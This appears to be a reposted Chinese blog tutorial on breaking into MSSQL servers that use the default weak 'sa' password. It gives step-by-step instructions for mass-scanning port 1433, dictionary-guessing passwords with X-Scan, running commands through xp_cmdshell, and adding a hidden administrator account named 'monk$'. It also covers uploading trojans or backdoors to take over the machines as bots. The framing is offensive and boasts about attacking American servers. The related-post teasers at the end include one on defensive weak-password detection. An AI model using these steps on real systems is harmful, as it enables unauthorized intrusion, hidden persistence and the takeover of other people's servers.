sql弱口令入侵

2021-04-09 04:15:38 字數 1732 閱讀 3850

sql弱口令入侵

mssql伺服器sa使用者弱口令入侵是及其經典的一種黑客入侵手法 。

其成名是在中美黑客大戰的時候,我們的前輩利用它入侵了很多美國鬼

子的伺服器。下面我介紹一下這種入侵的詳細情況。

基礎知識:

我們在安裝mssql伺服器之後,系統會有個預設的帳號sa

,而這個帳號預設又是空密碼。最要命的是這個sa級別的使用者幾乎等

同於系統使用者中的administrators,而且mssql有

個xp_cmdshell擴充套件儲存功能,這玩意使得我們通過mss

ql合法的語句就可以呼叫cmd來執行dos命令。於是災難來了。

入侵:

工具:s(快速掃瞄埠工具,命令列下的),xsacn

(安焦出品的伺服器掃瞄軟體),sqltools

(sql綜合利用工具),木馬或者後門乙個

眾所周知,mssql伺服器的特徵埠是1433

(我見過bt的網管改過它的預設埠,但大部分管管還是正常人

,嘻嘻)

於是第一步:

用s大面積掃瞄開放1433埠的活動主機。

(在安裝xp sp2之後,s之類的併發執行緒很大的掃瞄工具不能正常使用

,可以在其他作業系統環境下掃瞄,或者用肉雞掃)

第二步:

把掃瞄結果儲存為文字,並處理成一行乙個ip的格式

第三步:

使用xsacn,載入掃瞄主機列表檔案(就是第二步儲存的文字)

,配置好字典(xscan自帶有一套),在掃瞄選項裡只勾選sql

弱口令,開始掃瞄。

(大面積掃瞄不建議掛載十分複雜的字典,注意這是弱口令

,所以使用常規字典就可以,加快速度)

第四步:

喝杯茶,看會電視,唱唱歌,去溜達一圈。等著掃瞄報告吧。

xsacn掃瞄完成後會自動生成掃瞄報告,裡面有詳細結果。

第五步:

利用sql綜合利用工具連線上面得到的弱口令主機

。先看看能不能使用dos命令

以下是一部分常用的命令

dir c:/                       //瀏覽c盤

type c:/boot.ini               //顯示boot.ini的內容,用於檢視作業系統型別與版本

ver                           //功能同上

net start                       //檢視系統啟動的服務

netstat -na                     //檢視埠開發情況

net user                         //檢視當前系統使用者情況

net user monk$ monk /add           //新增乙個名為monk$密碼為monk的使用者

net localgroup administrators monk$ /add   //將monk$使用者加入管理組

為什麼要建立monk$這樣乙個使用者呢?因為使用者名稱後面帶 $符號後,管理員使用:net user 看不到,但缺點就是在管理面板中可以看到。(強一點的隱藏方法是帳

號轉殖,這裡就不說了)

如果我們發現伺服器的 終端服務:terminal service是開放的,對方又是2000或者2003伺服器

,那麼我們可以直接新增使用者,遠端登陸。

如果沒有終端,或者終端不開放。那我們可以使用上傳功能

,把我們的後門或者木馬上傳上去,執行。

這樣就簡單得拿到一台肉雞了。 

sa弱口令強行入侵

我自己現在找肉雞主要是找sa弱口令肉雞到還能找到幾隻,但也碰到不少困難,到處查資料總算找到點有用的。下面這些命令要sql分離器才能實現,下面是一些關於sa弱口令相關命令。一.更改sa口令方法 二.簡單修補sa弱口令 方法1 查詢分離器連線後執行 if exists select from dbo.s...

入侵感知系列之弱口令檢測思路

弱口令檢測 背景 在安全方面弱口令問題算是技術含量最低的安全隱患了。但往往技術含量越低,被利用頻率也越高,而且造成的影響還不見得小。所以治理弱口令將成為安全體系建設中價效比最高的乙個環節。但是就是這樣乙個價效比高的環節想完全杜絕卻不是那麼容易,未來的系統可以通過註冊申請環節強制設定強密碼,但是針對過...

弱口令總結(什麼是弱口令)

空口令 口令長度小於8 口令不應該為連續的某個字元 qqqqqq 賬號密碼相同 例 root root 口令與賬號相反 例 root toor 口令純數字 例 112312324234,號 口令純字母 例 asdjfhask 口令已數字代替字母 例 hello word,hell0 w0rd 口令採...